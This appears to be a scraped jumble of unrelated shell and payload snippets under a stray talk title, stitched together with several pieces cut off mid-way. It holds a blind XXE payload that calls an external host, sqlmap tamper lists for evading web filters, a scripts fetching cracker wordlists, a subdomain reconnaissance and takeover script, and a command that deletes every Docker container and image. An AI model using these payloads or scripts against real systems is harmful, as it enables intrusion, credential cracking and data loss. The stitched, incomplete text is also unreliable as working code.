Live coding demo from talk at Kod.io @ Linz 2014.
#!/bin/bash
#Script by OliverK
#Downloads _every_ wordlist in the packet storm security site.
#April 18th, 2011
# Updated Oct , 2th, 2012
mkdir common
cd common
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
wget --limit-rate 50k http://dl.packetstormsecurity.net/Crackers/wordlists/common-2
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
#!/usr/bin/env bash
DOMAIN="example.com"
EMAIL="contact@personalemail.com"
http -a 'api:key-00000000000000000000000000000000' \
-f POST "https://api.mailgun.net/v3/$DOMAIN/messages" \
from="Excited User <postmaster@$DOMAIN>" \
to="$EMAIL" \
subject="Hello" \
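#!/bin/sh
# Decompress a gzip-compressed tarball with pigz and unpack it with tar.
# POSIX sh has no "==" in test, so check for an empty argument with -z.
if [ -z "$1" ]; then
echo "Usage: $0 <file to uncompress>"
exit 1
fi
# Quote the filename so paths containing spaces are passed intact.
pigz -dc "$1" | tar xf -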
#!/bin/bash
# kill current docker
docker kill $(docker ps -q)
# Delete all containers
docker rm $(docker ps -a -q)
# Delete all images
docker rmi $(docker images -q)
# 2017-10-01T14:14:44+00:00
#!/bin/bash
#Script by OliverK
#Downloads _every_ wordlist in the packet storm security site.
#April 18th, 2011
# Updated Oct , 2th, 2012
mkdir common
cd common
wget --no-check-certificate http://dl.packetstormsecurity.net/Crackers/wordlists/common-4
wget --no-check-certificate http://dl.packetstormsecurity.net/Crackers/wordlists/common-3
wget --no-check-certificate http://dl.packetstormsecurity.net/Crackers/wordlists/common-2
# All scripts
```
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
```
# General scripts
```
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
```
# Microsoft access
```
#!/bin/bash
# $1 is the target domain; it is quoted throughout so it is passed as one argument.
echo "[*]Basic Aquatone Scan Started [*]"
aquatone-discover -d "$1" --threads 10
aquatone-scan -d "$1" --ports huge --threads 10
DEBUG=nightmare xvfb-run -a aquatone-gather -d "$1" --threads 10
aquatone-takeover -d "$1" --threads 10
echo "[*]sublistr scan for subdomains[*]"
python /root/Sublist3r/sublist3r.py -v -b -d "$1" -o "$1-subdomains.txt"
dos2unix "$1-subdomains.txt"
echo "Merging found subdomains"